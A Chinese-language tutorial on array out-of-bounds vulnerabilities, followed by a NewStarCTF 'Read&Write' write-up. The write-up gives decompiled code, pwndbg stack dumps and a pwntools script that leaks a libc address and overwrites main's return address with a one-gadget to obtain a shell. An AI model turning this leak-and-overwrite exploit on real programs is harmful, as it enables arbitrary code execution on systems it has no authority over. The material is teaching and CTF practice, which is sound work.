1. 基本概念
数组越界(Array Out-of-Bounds)通常发生在以下两种情况下:
- 访问数组下标小于0的位置。
- 访问数组下标大于等于数组长度的位置。
2. 示例代码
假设有一个C语言程序:
c
#include <stdio.h>
/*
 * Deliberately broken demonstration of an out-of-bounds read.
 * array has exactly 5 elements (valid indices 0..4), but the loop bound
 * admits i == 5, so the final iteration reads one element past the end.
 * That read is undefined behavior; the correct bound is i < 5 (or
 * sizeof array / sizeof array[0]).
 */
void vulnerable_function() {
    int array[5] = {1, 2, 3, 4, 5};
    int i;
    for (i = 0; i <= 5; i++) { // note: the condition here is i <= 5, so the last iteration reads array[5]
        printf("%d\n", array[i]);
    }
}
/* Entry point: runs the demonstration once and exits with success. */
int main(void) {
    vulnerable_function();
    return 0;
}
在这个示例中,array 数组的长度是5,合法的访问下标应该是0到4。然而,for 循环的条件是 i <= 5,这意味着当 i 等于5时,array[i] 将访问到数组边界之外的内存位置。这就是一个典型的数组越界漏洞。
4. 防御措施
- 边界检查:确保在访问数组元素时进行严格的边界检查。
- 使用安全函数:一些编程语言和库提供了安全函数,帮助防止数组越界。例如,C++的 std::vector::at() 方法会进行边界检查。
- 工具和分析:使用静态和动态分析工具检测程序中的潜在数组越界漏洞。
练习[NewStarCTF 公开赛赛道]Read&Write
查看main
c
/*
 * Decompiled main of the challenge binary (IDA output, kept verbatim).
 * Menu loop: choice 1 prints nums[idx], choice 2 stores num_to_write into
 * nums[idx]; any other choice, or a failed scanf, leaves the loop and main
 * returns.
 *
 * The defect: idx is read with "%u" and used as an array index on both
 * paths without any comparison against the array length (256).  From the
 * frame offsets below, nums occupies [rbp-0x410, rbp-0x10), so idx >= 256
 * addresses the stack above the array: the canary copy v8 at [rbp-8] is
 * nums[258] and the saved return address at [rbp+8] is nums[262].  The
 * missing check is a guard such as `if (idx >= 256) break;` before each
 * use of nums[idx] (or a bound derived from sizeof(nums) / sizeof(nums[0])).
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
    unsigned int choice; // [rsp+4h] [rbp-41Ch] BYREF
    unsigned int idx; // [rsp+8h] [rbp-418h] BYREF   never range-checked before indexing nums
    unsigned int num_to_write; // [rsp+Ch] [rbp-414h] BYREF
    int nums[256]; // [rsp+10h] [rbp-410h] BYREF   0x400 bytes, indices 0..255
    unsigned __int64 v8; // [rsp+418h] [rbp-8h]   stack canary copy (checksec reports "Canary found")
    v8 = __readfsqword(0x28u);
    init();
    menu();
    memset(nums, 0, sizeof(nums));
    while ( 1 )
    {
        printf("> ");
        if ( (int)__isoc99_scanf("%u", &choice) < 0 )
            break;
        if ( choice == 1 )
        {
            printf("Idx:");
            if ( (int)__isoc99_scanf("%u", &idx) < 0 )
                break;
            // Out-of-bounds read: idx is unchecked.
            printf("The num: %u\n", (unsigned int)nums[idx]);
        }
        else
        {
            if ( choice != 2 )
                break;
            printf("Idx:");
            if ( (int)__isoc99_scanf("%u", &idx) < 0 )
                break;
            printf("Num:");
            if ( (int)__isoc99_scanf("%u", &num_to_write) < 0 )
                break;
            // Out-of-bounds write: idx is unchecked, so this can reach the
            // canary and saved registers above the array.
            nums[idx] = num_to_write;
            puts("Done!");
        }
    }
    puts("Byebye!");
    return 0;
}
很明显的数组越界,我们来找一下偏移
python
Idx:256
Breakpoint 2, 0x0000555555400a23 in main () at Read&Write.c:38
38 in Read&Write.c
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
─────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]──────────────────────
RAX 0
RBX 0x555555400af0 (__libc_csu_init) ◂--- push r15
RCX 0
RDX 0
RDI 0x555555400be2 ◂--- push rsp /* 'The num: %u\n' */
RSI 0xffffc370
R8 0xa
R9 0
R10 0x7ffff7f70ac0 ◂--- 0x100000000
R11 0x7ffff7f713c0 ◂--- 0x2000200020002
R12 0x5555554007a0 (_start) ◂--- xor ebp, ebp
R13 0x7fffffffc370 ◂--- 1
R14 0
R15 0
RBP 0x7fffffffc280 ◂--- 0
RSP 0x7fffffffbe60 ◂--- 0x1ffffbef4
RIP 0x555555400a23 (main+225) ◂--- call 0x555555400750
──────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────
► 0x555555400a23 <main+225> call printf@plt <printf@plt>
format: 0x555555400be2 ◂--- 'The num: %u\n'
vararg: 0xffffc370
0x555555400a28 <main+230> jmp main+367 <main+367>
↓
0x555555400ab1 <main+367> jmp main+71 <main+71>
↓
0x555555400989 <main+71> lea rdi, [rip + 0x247] RDI => 0x555555400bd7 ◂--- and byte ptr ds:[rax], al /* '> ' */
0x555555400990 <main+78> mov eax, 0 EAX => 0
0x555555400995 <main+83> call printf@plt <printf@plt>
0x55555540099a <main+88> lea rax, [rbp - 0x41c]
0x5555554009a1 <main+95> mov rsi, rax
0x5555554009a4 <main+98> lea rdi, [rip + 0x22f] RDI => 0x555555400bda ◂--- and eax, 0x64490075 /* '%u' */
0x5555554009ab <main+105> mov eax, 0 EAX => 0
0x5555554009b0 <main+110> call __isoc99_scanf@plt <__isoc99_scanf@plt>
────────────────────────────────────────────[ STACK ]────────────────────────────────────────────
00:0000│ rsp 0x7fffffffbe60 ◂--- 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂--- 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓ 5 skipped
──────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────
► 0 0x555555400a23 main+225
1 0x7ffff7df9083 __libc_start_main+243
─────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> stack 200
00:0000│ rsp 0x7fffffffbe60 ◂--- 0x1ffffbef4
01:0008│-418 0x7fffffffbe68 ◂--- 0x7fff00000100
02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓ 127 skipped
82:0410│-010 0x7fffffffc270 ---▸ 0x7fffffffc370 ◂--- 1
83:0418│-008 0x7fffffffc278 ◂--- 0x8c8da80a4deecc00
84:0420│ rbp 0x7fffffffc280 ◂--- 0
85:0428│+008 0x7fffffffc288 ---▸ 0x7ffff7df9083 (__libc_start_main+243) ◂--- mov edi, eax
86:0430│+010 0x7fffffffc290 ---▸ 0x7ffff7ffc620 (_rtld_global_ro) ◂--- 0x50fa300000000
87:0438│+018 0x7fffffffc298 ---▸ 0x7fffffffc378 ---▸ 0x7fffffffc74a ◂--- '/home/a5rz/Desktop/pwn/file/pwn'
88:0440│+020 0x7fffffffc2a0 ◂--- 0x100000000
89:0448│+028 0x7fffffffc2a8 ---▸ 0x555555400942 (main) ◂--- push rbp
8a:0450│+030 0x7fffffffc2b0 ---▸ 0x555555400af0 (__libc_csu_init) ◂--- push r15
8b:0458│+038 0x7fffffffc2b8 ◂--- 0xf489a56c1b84c028
8c:0460│+040 0x7fffffffc2c0 ---▸ 0x5555554007a0 (_start) ◂--- xor ebp, ebp
8d:0468│+048 0x7fffffffc2c8 ---▸ 0x7fffffffc370 ◂--- 1
8e:0470│+050 0x7fffffffc2d0 ◂--- 0
8f:0478│+058 0x7fffffffc2d8 ◂--- 0
90:0480│+060 0x7fffffffc2e0 ◂--- 0xb765a939ea4c028
91:0488│+068 0x7fffffffc2e8 ◂--- 0xb764ad33beac028
92:0490│+070 0x7fffffffc2f0 ◂--- 0
... ↓ 2 skipped
95:04a8│+088 0x7fffffffc308 ◂--- 1
96:04b0│+090 0x7fffffffc310 ---▸ 0x7fffffffc378 ---▸ 0x7fffffffc74a ◂--- '/home/a5rz/Desktop/pwn/file/pwn'
97:04b8│+098 0x7fffffffc318 ---▸ 0x7fffffffc388 ---▸ 0x7fffffffc76a ◂--- 'LC_NAME=zh_CN.UTF-8'
98:04c0│+0a0 0x7fffffffc320 ---▸ 0x7ffff7ffe190 ---▸ 0x555555400000 ◂--- jg 0x555555400047
c
02:0010│-410 0x7fffffffbe70 ◂--- 0
... ↓ 127 skipped
128*2 = 256:栈上这128个8字节单元正好对应256个int。数组下标从0开始,所以256是数组之外的第一个下标。
接下来看看保护
python
[*] '/home/a5rz/Desktop/pwn/file/pwn'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
Stripped: No
Debuginfo: Yes
尝试ogg
python
def out_add(idx: int) -> int:
    """Read the 64-bit value spanning nums[idx] and nums[idx + 1] via menu choice 1.

    The target prints each 32-bit cell as an unsigned decimal after "The num: ".
    The low half lives at idx and the high half at idx + 1 (little-endian
    target, see checksec output), and the two are re-joined through their
    hex text.  Returns the combined value.
    """
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx))
    io.recvuntil(b'num:')
    part_1 = int(io.recvuntil(b'\n')[:-1], 10)  # low 32 bits
    print(hex(part_1))
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.recvuntil(b'num:')
    part_2 = int(io.recvuntil(b'\n')[:-1], 10)  # high 32 bits
    print(hex(part_2))
    # NOTE(review): hex() does no zero padding, so this text join assumes the
    # low half renders as exactly 8 hex digits.
    adder = int(str(hex(part_2))[2:] + str(hex(part_1))[2:], 16)
    print(hex(adder))
    return adder
def write_add(idx: int, adder: int) -> None:
    """Store a 64-bit value into nums[idx] and nums[idx + 1] via menu choice 2.

    The value is split into its little-endian low and high 32-bit halves,
    each sent as an unsigned decimal to the "Num:" prompt.
    """
    adder = p64(adder)
    low = int.from_bytes(adder[:4], byteorder='little')   # bytes 0..3 -> nums[idx]
    high = int.from_bytes(adder[4:], byteorder='little')  # bytes 4..7 -> nums[idx + 1]
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx))
    io.sendlineafter(b'Num:', str(low))
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b'Idx:', str(idx + 1))
    io.sendlineafter(b'Num:', str(high))
# Index 262 is main's saved return address: from the decompiled frame offsets,
# nums starts at rbp-0x410 and the return address is at rbp+8, i.e. 0x418/4 = 262.
adder = out_add(262)
# The backtrace above shows that return address is __libc_start_main+243.
libc_base = adder - (libc.sym['__libc_start_main'] + 243)
print(f'---------->{hex(libc_base)}')
ogg = [0xe3afe, 0xe3b01, 0xe3b04]  # candidate one-gadget offsets as given on the page; only ogg[1] is used
go_addr = libc_base + ogg[1]
write_add(262, go_addr)
# Any choice other than 1 or 2 breaks the menu loop, so main returns.
io.sendlineafter(b'> ', b'0')
get shell!!!